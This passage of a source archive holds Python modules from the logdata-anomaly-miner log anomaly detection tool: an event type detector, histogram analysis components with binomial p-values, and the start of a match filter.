strings, defaults to empty list). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id_path_list is set). @param allowed_id_tuples a list of tuples of allowed values (only if id_path_list is set). @param min_num_vals number of the values which the list of stored logline values is being reduced to. @param max_num_vals the maximum list size of the stored logline values before being reduced to the last min_num_values. @param save_values if false the values of the log atom are not saved for further analysis. This disables values and check_variables. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( mutable_default_args=["id_path_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, id_path_list=id_path_list, allow_missing_id=allow_missing_id, allowed_id_tuples=allowed_id_tuples, min_num_vals=min_num_vals, max_num_vals=max_num_vals, save_values=save_values, log_resource_ignore_list=log_resource_ignore_list ) self.num_events = 0 self.longest_path = [] # List of the longest path of the events self.found_keys = [] # List of the keys corresponding to the events self.variable_key_list = [] # List of the keys, which take values in the log line # List of the values of the log lines. If the length reaches max_num_vals the list gets reduced to min_num_vals values per variable self.values = [] self.num_event_lines = [] # Saves the number of lines of the event types self.total_records = 0 # Saves the number of total log lines # List of the modules which follow the event_type_detector. The implemented modules are form the list # [VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector] self.following_modules = [] self.check_variables = [] # List of bools, which state if the variables of variable_key_list are updated. # List ot the time trigger. The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.etd_time_trigger = [[], [], []] self.num_event_lines_tsa_ref = [] # Reference containing the number of lines of the events for the TSA self.current_index = 0 # Index of the event type of the current log line self.id_path_list_tuples = [] # List of the id tuples self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.load_persistence_data() def receive_atom(self, log_atom): """Receives a parsed atom and keeps track of the event types and the values of the variables of them.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 valid_log_atom = False if self.target_path_list: for path in self.target_path_list: if path in log_atom.parser_match.get_match_dictionary().keys(): valid_log_atom = True break if self.target_path_list and not valid_log_atom: self.current_index = -1 return False self.total_records += 1 # Get the current index, either from the combination of values of the paths of id_path_list, or the event type if self.id_path_list: # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Check if only certain tuples are allowed and if the tuple is included. if self.allowed_id_tuples != [] and id_tuple not in self.allowed_id_tuples: self.current_index = -1 return False # Searches if the id_tuple has previously appeared current_index = -1 for event_index, var_key in enumerate(self.id_path_list_tuples): if id_tuple == var_key: current_index = event_index else: # Searches if the event type has previously appeared current_index = -1 for event_index in range(self.num_events): if self.longest_path[event_index] in log_atom.parser_match.get_match_dictionary() and set( log_atom.parser_match.get_match_dictionary()) == self.found_keys[event_index]: current_index = event_index # Initialize a new event type if the event type of the new line has not appeared if current_index == -1: current_index = self.num_events self.num_events += 1 self.found_keys.append(set(log_atom.parser_match.get_match_dictionary().keys())) # Initialize the list of the keys to the variables self.variable_key_list.append(list(self.found_keys[current_index])) # Delete the entries with value None or timestamps as values for var_index in range(len(self.variable_key_list[current_index]) - 1, -1, -1): if (type(log_atom.parser_match.get_match_dictionary()[self.variable_key_list[current_index][var_index]]).__name__ != "MatchElement") or (log_atom.parser_match.get_match_dictionary()[self.variable_key_list[ current_index][var_index]].match_object is None): del self.variable_key_list[current_index][var_index] elif (self.target_path_list is not None) and self.variable_key_list[current_index][var_index] not in self.target_path_list: del self.variable_key_list[current_index][var_index] # Initialize the empty lists for the values and initialize the check_variables list for the variables if self.save_values: self.init_values(current_index) self.check_variables.append([True for _ in range(len(self.variable_key_list[current_index]))]) self.num_event_lines.append(0) if not self.id_path_list: # String of the longest found path self.longest_path.append("") # Number of forward slashes in the longest path tmp_int = 0 if self.target_path_list is None: for var_key in self.variable_key_list[current_index]: if var_key is not None: count = var_key.count("/") if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(var_key)): self.longest_path[current_index] = var_key tmp_int = count else: for found_key in list(self.found_keys[current_index]): if found_key is None: found_key = "" count = found_key.count("/") if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(found_key)): self.longest_path[current_index] = found_key tmp_int = count else: self.id_path_list_tuples.append(id_tuple) self.current_index = current_index if self.save_values: # Appends the values to the event type self.append_values(log_atom, current_index) self.num_event_lines[current_index] += 1 self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" tmp_list = [[]] for key in self.found_keys: tmp_list[0].append(list(key)) tmp_list.append(self.variable_key_list) tmp_list.append(self.values) tmp_list.append(self.longest_path) tmp_list.append(self.check_variables) tmp_list.append(self.num_event_lines) tmp_list.append(self.id_path_list_tuples) PersistenceUtil.store_json(self.persistence_file_name, tmp_list) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for key in persistence_data[0]: self.found_keys.append(set(key)) self.variable_key_list = persistence_data[1] self.values = persistence_data[2] self.longest_path = persistence_data[3] self.check_variables = persistence_data[4] self.num_event_lines = persistence_data[5] self.id_path_list_tuples = [tuple(tuple_list) for tuple_list in persistence_data[6]] self.num_events = len(self.found_keys) def add_following_modules(self, following_module): """Add the given Module to the following module list.""" self.following_modules.append(following_module) logging.getLogger(DEBUG_LOG_NAME).debug( "%s added following module %s.", self.__class__.__name__, following_module.__class__.__name__) def init_values(self, current_index): """Initialize the variable_key_list and the list for the values.""" # Initializes the value list if not self.values: self.values = [[[] for _ in range(len(self.variable_key_list[current_index]))]] else: self.values.append([[] for _ in range(len(self.variable_key_list[current_index]))]) def append_values(self, log_atom, current_index): """Add the values of the variables of the current line to self.values.""" for var_index, var_key in enumerate(self.variable_key_list[current_index]): # Skips the variable if check_variable is False, or if the var_key is not included in the match_dict if not self.check_variables[current_index][var_index]: continue if var_key not in log_atom.parser_match.get_match_dictionary(): self.values[current_index][var_index] = [] self.check_variables[current_index][var_index] = False continue raw_match_object = "" if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytearray): raw_match_object = repr( bytes(log_atom.parser_match.get_match_dictionary()[var_key].match_object))[2:-1] elif isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytes): raw_match_object = repr(log_atom.parser_match.get_match_dictionary()[var_key].match_object)[2:-1] # Try to convert the values to floats and add them as values try: if raw_match_object != "": self.values[current_index][var_index].append(float(raw_match_object)) else: self.values[current_index][var_index].append( float(log_atom.parser_match.get_match_dictionary()[var_key].match_object)) # Add the strings as values except ValueError: if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_string, bytes): self.values[current_index][var_index].append( repr(log_atom.parser_match.get_match_dictionary()[var_key].match_string)[2:-1]) else: self.values[current_index][var_index].append(log_atom.parser_match.get_match_dictionary()[var_key].match_string) # Reduce the numbers of entries in the value list if len(self.variable_key_list[current_index]) > 0 and len([i for i in self.check_variables[current_index] if i]) > 0 and \ len(self.values[current_index][self.check_variables[current_index].index(True)]) > self.max_num_vals: for var_index in range(len(self.variable_key_list[current_index])): # Skips the variable if check_variable is False if not self.check_variables[current_index][var_index]: continue self.values[current_index][var_index] = self.values[current_index][var_index][-self.min_num_vals:] def get_event_type(self, event_index): """Return a string which includes information about the event type.""" if self.id_path_list: return_string = str(event_index) + " (" + str(self.id_path_list_tuples[event_index]) + ")" else: return_string = str(event_index) + " (" + str(self.longest_path[event_index]) + ")" return return_string HistogramAnalysis.py000066400000000000000000000726221500476301700347730ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function moduloTimeBinDefinition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogramAnalysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [("/model/line/time", moduloTimeBinDefinition)], 3600*24*7, # Reporting interval (weekly) anomaly_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atomFilter.addHandler(histogramAnalysis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import abc import logging from datetime import datetime import numpy from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig from aminer.input.InputInterfaces import AtomHandlerInterface from scipy import stats, version binomial_test = None v = [int(x) for x in version.full_version.split(".")] if v[0] >= 1 and v[1] >= 7: binomial_test = stats.binomtest else: binomial_test = stats.binom_test date_string = "%Y-%m-%d %H:%M:%S" class BinDefinition(metaclass=abc.ABCMeta): """This class defines the bins of the histogram.""" @abc.abstractmethod def __init__(self): """Initiate the BinDefinition.""" @abc.abstractmethod def has_outlier_bins(self): """Report if this binning works with outlier bins, that are bins for all values outside the normal binning range. If not, outliers are discarded. When true, the outlier bins are the first and last bin. """ @abc.abstractmethod def get_bin_names(self): """Get the names of the bins for reporting, including the outlier bins if any.""" @abc.abstractmethod def get_bin(self, value): """Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ @abc.abstractmethod def get_bin_p_value(self, bin_pos, total_values, bin_values): """Calculate a p-Value, how likely the observed number of elements in this bin is. This method is used as an interface method, but it also returns a default value. @return the value or None when not applicable. """ return None class LinearNumericBinDefinition(BinDefinition): """This class defines the linear numeric bins.""" def __init__(self, lower_limit, bin_size, bin_count, outlier_bins_flag=False): if isinstance(lower_limit, bool) or not isinstance(lower_limit, (float, int)): msg = "lower_limit has to be of the type float or integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(bin_size, bool) or not isinstance(bin_size, int): msg = "bin_size has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if bin_size < 1: msg = "bin_size has to be greater than or equal to 1." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(bin_count, bool) or not isinstance(bin_count, int): msg = "bin_count has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if bin_count < 1: msg = "bin_count has to be greater than or equal to 1." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(outlier_bins_flag, bool): msg = "outlier_bins_flag has to be of the type boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.lower_limit = lower_limit self.bin_size = bin_size self.bin_count = bin_count self.outlier_bins_flag = outlier_bins_flag self.bin_names = None self.expected_bin_ratio = 1.0 / float(bin_count) def has_outlier_bins(self): """Report if this binning works with outlier bins, that are bins for all values outside the normal binning range. If not, outliers are discarded. When true, the outlier bins are the first and last bin. """ return self.outlier_bins_flag def get_bin_names(self): """Get the names of the bins for reporting, including the outlier bins if any.""" # Cache the names here so that multiple histograms using same BinDefinition do not use separate copies of the strings. if self.bin_names is not None: return self.bin_names self.bin_names = [] if self.outlier_bins_flag: self.bin_names.append(f"...-{self.lower_limit}]") start = self.lower_limit for bin_pos in range(1, self.bin_count + 1): end = self.lower_limit + bin_pos * self.bin_size self.bin_names.append(f"[{start}-{end}]") start = end if self.outlier_bins_flag: self.bin_names.append(f"[{start}-...") return self.bin_names def get_bin(self, value): """Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ if self.outlier_bins_flag: if value < self.lower_limit: return 0 pos = int((value - self.lower_limit) / self.bin_size) if pos < self.bin_count: return pos + 1 return self.bin_count + 1 if value < self.lower_limit: return None pos = int((value - self.lower_limit) / self.bin_size) if pos < self.bin_count: return pos return None def get_bin_p_value(self, bin_pos, total_values, bin_values): """Calculate a p-Value, how likely the observed number of elements in this bin is. @return the value or None when not applicable. """ if binomial_test is None: return None if self.outlier_bins_flag and (bin_pos == 0 or bin_pos > self.bin_count): return None p_value = binomial_test(bin_values, total_values, self.expected_bin_ratio) if not isinstance(p_value, (numpy.floating, float)): p_value = p_value.pvalue return p_value class ModuloTimeBinDefinition(LinearNumericBinDefinition): """This class defines the module time bins.""" def __init__(self, modulo_value, time_unit, lower_limit, bin_size, bin_count, outlier_bins_flag=False): super(ModuloTimeBinDefinition, self).__init__(lower_limit, bin_size, bin_count, outlier_bins_flag) self.modulo_value = modulo_value self.time_unit = time_unit if isinstance(modulo_value, bool) or not isinstance(modulo_value, (float, int)): msg = "modulo_value has to be of the type float or integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if modulo_value <= 0: msg = "modulo_value has to be positive and greater than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(time_unit, bool) or not isinstance(time_unit, int): msg = "time_unit has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if time_unit < 1: msg = "time_unit has to be positive and greater than or equal to 1." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if lower_limit < 0: msg = "lower_limit has to be positive in ModuloTimeBinDefinition." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) def get_bin(self, value): """Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ if value is None: value = 0 if isinstance(value, bytes): value = int.from_bytes(value, "big") return super(ModuloTimeBinDefinition, self).get_bin(value) if isinstance(value, str): value = int.from_bytes(value.encode(), "big") return super(ModuloTimeBinDefinition, self).get_bin(value) time_value = (value % self.modulo_value) / self.time_unit return super(ModuloTimeBinDefinition, self).get_bin(time_value) class HistogramData: """This class defines the properties of one histogram to create and performs the accounting and reporting. When the Python scipy package is available, reports will also include probability score created using binomial testing. """ def __init__(self, property_path, bin_definition): """Create the histogram data structures.""" if not isinstance(property_path, str): msg = "property_path has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(property_path) < 1: msg = "property_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(bin_definition, BinDefinition): msg = "bin_definition has to be of the type BinDefinition." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.property_path = property_path self.bin_definition = bin_definition self.bin_names = bin_definition.get_bin_names() self.bin_data = [0] * (len(self.bin_names)) self.has_outlier_bins_flag = bin_definition.has_outlier_bins() self.total_elements = 0 self.binned_elements = 0 def add_value(self, value): """Add one value to the histogram.""" bin_pos = self.bin_definition.get_bin(value) self.bin_data[bin_pos] += 1 self.total_elements += 1 if self.has_outlier_bins_flag and bin_pos != 0 and bin_pos + 1 != len(self.bin_names): self.binned_elements += 1 def reset(self): """Remove all values from this histogram.""" self.total_elements = 0 self.binned_elements = 0 self.bin_data = [0] * len(self.bin_data) def clone(self): """Clone this object so that calls to add_value do not influence the old object anymore. This behavior is a mixture of shallow and deep copy. """ histogram_data = HistogramData(self.property_path, self.bin_definition) histogram_data.bin_names = self.bin_names histogram_data.bin_data = self.bin_data[:] histogram_data.total_elements = self.total_elements histogram_data.binned_elements = self.binned_elements return histogram_data def to_string(self, indent): """Get a string representation of this histogram.""" result = f'{indent}Property "{self.property_path}" ({self.total_elements} elements):' f_elements = float(self.total_elements) base_element = self.binned_elements if self.has_outlier_bins_flag else self.total_elements for bin_pos, count in enumerate(self.bin_data): if count == 0: continue p_value = self.bin_definition.get_bin_p_value(bin_pos, base_element, count) if p_value is None: result += "\n%s* %s: %d (ratio = %.2e)" % (indent, self.bin_names[bin_pos], count, float(count) / f_elements) else: result += "\n%s* %s: %d (ratio = %.2e, p = %.2e)" % \ (indent, self.bin_names[bin_pos], count, float(count) / f_elements, p_value) return result class HistogramAnalysis(AtomHandlerInterface): """This class creates a histogram for one or more properties extracted from a parsed atom.""" def __init__(self, aminer_config, histogram_definitions, report_interval, anomaly_event_handlers, reset_after_report_flag=True, output_logline=True, log_resource_ignore_list=None): """Initialize the analysis component. @param aminer_config configuration from analysis_context. @param histogram_definitions a list of tuples containing the target property path to analyze and the BinDefinition to apply. @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param reset_after_report_flag reset the histogram data after reporting. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ self.log_success, self.log_total = [None]*2 super().__init__( aminer_config=aminer_config, report_interval=report_interval, anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, output_logline=output_logline, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not isinstance(histogram_definitions, list): msg = "histogram_definitions has to be a list of tuples of paths and bin definitions." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for item in histogram_definitions: if not isinstance(item, tuple) or len(item) != 2 or not isinstance(item[0], str) or not isinstance(item[1], BinDefinition): msg = "histogram_definitions has to be a list of tuples of paths and bin definitions." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(histogram_definitions) == 0: msg = "histogram_definitions must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.histogram_definitions = histogram_definitions self.last_report_time = None self.next_report_time = 0.0 self.histogram_data = [] for (path, bin_definition) in histogram_definitions: self.histogram_data.append(HistogramData(path, bin_definition)) def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() for data_item in self.histogram_data: match = match_dict.get(data_item.property_path, None) if match is None: continue self.log_success += 1 data_item.add_value(match.match_object) timestamp = log_atom.get_timestamp() if self.next_report_time < timestamp: if self.last_report_time is None: self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval else: self.send_report(log_atom, timestamp) def send_report(self, log_atom, timestamp): """Send a report to the event handlers.""" report_str = "Histogram report " if self.last_report_time is not None: report_str += f"from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} " report_str += f"till {datetime.fromtimestamp(timestamp).strftime(date_string)}" affected_log_atom_paths = [] analysis_component = {"AffectedLogAtomPaths": affected_log_atom_paths} for histogramData in self.histogram_data: affected_log_atom_paths.append(histogramData.property_path) res = [] h = [] for data_item in self.histogram_data: d = {} bins = {} i = 0 while i < len(data_item.bin_names): bins[data_item.bin_names[i]] = data_item.bin_data[i] i = i + 1 d["TotalElements"] = data_item.total_elements d["BinnedElements"] = data_item.binned_elements d["HasOutlierBinsFlag"] = data_item.has_outlier_bins_flag d["Bins"] = bins if self.output_logline: bin_definition = { "Type": str(data_item.bin_definition.__class__.__name__), "LowerLimit": data_item.bin_definition.lower_limit, "BinSize": data_item.bin_definition.bin_size, "BinCount": data_item.bin_definition.bin_count, "OutlierBinsFlag": data_item.bin_definition.outlier_bins_flag, "BinNames": data_item.bin_definition.bin_names, "ExpectedBinRatio": data_item.bin_definition.expected_bin_ratio} if isinstance(data_item.bin_definition, ModuloTimeBinDefinition): bin_definition["ModuloValue"] = data_item.bin_definition.modulo_value bin_definition["TimeUnit"] = data_item.bin_definition.time_unit d["BinDefinition"] = bin_definition d["PropertyPath"] = data_item.property_path for line in data_item.to_string(" ").split("\n"): report_str += os.linesep + line res += [""] * data_item.total_elements h.append(d) analysis_component["HistogramData"] = h analysis_component["ReportInterval"] = self.report_interval analysis_component["ResetAfterReportFlag"] = self.reset_after_report_flag event_data = {"AnalysisComponent": analysis_component} if len(res) > 0: res[0] = report_str for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Histogram report", res, event_data, log_atom, self) if self.reset_after_report_flag: for data_item in self.histogram_data: data_item.reset() self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) class PathDependentHistogramAnalysis(AtomHandlerInterface): """This class provides a histogram analysis for only one property but separate histograms for each group of correlated match paths. Assume there two paths that include the requested property but they separate after the property was found on the path. Then objects of this class will produce 3 histograms: one for common path part including all occurences of the target property and one for each separate subpath, counting only those property values where the specific subpath was followed. """ def __init__(self, aminer_config, target_path, bin_definition, report_interval, anomaly_event_handlers, reset_after_report_flag=True, output_logline=True, log_resource_ignore_list=None): """Initialize the analysis component. @param aminer_config configuration from analysis_context. @param target_path the path to be analyzed in the parser match of the log atom. @param bin_definition the bin definition (LinearNumericBinDefinition, ModuloTimeBinDefinition) to be used. @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param reset_after_report_flag reset the histogram data after reporting. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( aminer_config=aminer_config, target_path=target_path, report_interval=report_interval, anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, output_logline=output_logline, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not isinstance(bin_definition, BinDefinition): msg = "bin_definition has to be of type BinDefinition." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.last_report_time = None self.next_report_time = 0.0 self.bin_definition = bin_definition self.histogram_data = {} def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() match = match_dict.get(self.target_path, None) if match is None: return match_value = match.match_object all_path_set = set(match_dict.keys()) unmapped_path = [] missing_paths = set() while all_path_set: path = all_path_set.pop() histogram_mapping = self.histogram_data.get(path) if histogram_mapping is None: unmapped_path.append(path) continue # So the path is already mapped to one histogram. See if all paths to the given histogram are still in all_path_set. If not, # a split within the mapping is needed. clone_set = all_path_set.copy() mapped_path = None for mapped_path in histogram_mapping[0]: try: clone_set.remove(mapped_path) except KeyError: if mapped_path != path: missing_paths.add(mapped_path) if not missing_paths: # Everything OK, just add the value to the mapping. match = match_dict.get(mapped_path, None) match_value = match.match_object if isinstance(match.match_object, bytes): match.match_object = match.match_object.decode(AminerConfig.ENCODING) histogram_mapping[1].target_path = mapped_path histogram_mapping[1].add_value(match_value) histogram_mapping[2] = log_atom.parser_match else: # We need to split the current set here. Keep the current statistics for all the missingPaths but clone the data for the # remaining paths. new_histogram = histogram_mapping[1].clone() match = match_dict.get(mapped_path, None) match_value = match.match_object histogram_mapping[1].target_path = mapped_path new_histogram.add_value(match_value) new_path_set = histogram_mapping[0] - missing_paths new_histogram_mapping = [new_path_set, new_histogram, log_atom.parser_match] for mapped_path in new_path_set: self.histogram_data[mapped_path] = new_histogram_mapping histogram_mapping[0] = missing_paths missing_paths = set() if unmapped_path: histogram = HistogramData(self.target_path, self.bin_definition) histogram.add_value(match_value) new_record = [set(unmapped_path), histogram, log_atom.parser_match] for path in unmapped_path: new_record[1].property_path = path self.histogram_data[path] = new_record timestamp = log_atom.get_timestamp() if self.next_report_time < timestamp: if self.last_report_time is None: self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval else: self.send_report(log_atom, timestamp) self.log_success += 1 def send_report(self, log_atom, timestamp): """Send report to event handlers.""" report_str = "Path histogram report " if self.last_report_time is not None: report_str += f"from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} " report_str += f"till {datetime.fromtimestamp(timestamp).strftime(date_string)}" all_path_set = set(self.histogram_data.keys()) analysis_component = {"AffectedLogAtomPaths": list(all_path_set)} res = [] h = [] while all_path_set: d = {} path = all_path_set.pop() histogram_mapping = self.histogram_data.get(path) data_item = histogram_mapping[1] bins = {} i = 0 while i < len(data_item.bin_names): bins[data_item.bin_names[i]] = data_item.bin_data[i] i = i + 1 d["TotalElements"] = data_item.total_elements d["BinnedElements"] = data_item.binned_elements d["HasOutlierBinsFlag"] = data_item.has_outlier_bins_flag d["Bins"] = bins if self.output_logline: bin_definition = { "Type": str(data_item.bin_definition.__class__.__name__), "LowerLimit": data_item.bin_definition.lower_limit, "BinSize": data_item.bin_definition.bin_size, "BinCount": data_item.bin_definition.bin_count, "OutlierBinsFlag": data_item.bin_definition.outlier_bins_flag, "BinNames": data_item.bin_definition.bin_names, "ExpectedBinRatio": data_item.bin_definition.expected_bin_ratio} if isinstance(data_item.bin_definition, ModuloTimeBinDefinition): bin_definition["ModuloValue"] = data_item.bin_definition.modulo_value bin_definition["TimeUnit"] = data_item.bin_definition.time_unit d["BinDefinition"] = bin_definition d["PropertyPath"] = data_item.target_path report_str += os.linesep + 'Path values "%s":' % '", "'.join(histogram_mapping[0]) if isinstance(histogram_mapping[2].match_element.match_string, bytes): histogram_mapping[2].match_element.match_string = histogram_mapping[2].match_element.match_string.decode( AminerConfig.ENCODING) report_str += os.linesep + f"Example: {histogram_mapping[2].match_element.match_string}" if len(res) < histogram_mapping[1].total_elements: res = [""] * histogram_mapping[1].total_elements for line in histogram_mapping[1].to_string(" ").split("\n"): report_str += os.linesep + f"{line}" if len(res) > 0: res[0] = report_str all_path_set.discard(path) h.append(d) analysis_component["MissingPaths"] = list(histogram_mapping[0]) analysis_component["HistogramData"] = h analysis_component["ReportInterval"] = self.report_interval analysis_component["ResetAfterReportFlag"] = self.reset_after_report_flag event_data = {"AnalysisComponent": analysis_component} if self.reset_after_report_flag: histogram_mapping[1].reset() for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Histogram report", res, event_data, log_atom, self) self.last_report_time = timestamp self.next_report_time = timestamp + self.report_interval logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/MatchFilter.py000066400000000000000000000106121500476301700336020ustar00rootroot00000000000000"""This module defines a filter for parsed paths and values. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME class MatchFilter(AtomHandlerInterface): """This class creates events for specified paths and values.""" def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, target_value_list=None, output_logline=True, log_resource_ignore_list=None): """Initialize the detector. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_value_list if not None, only match log atom if the match value is contained in the list. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, target_value_list=target_value_list, output_logline=output_logline, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if len(target_path_list) == 0: msg = "target_path_list must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) def receive_atom(self, log_atom): """Forward all log atoms that involve specified path and optionally value.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: 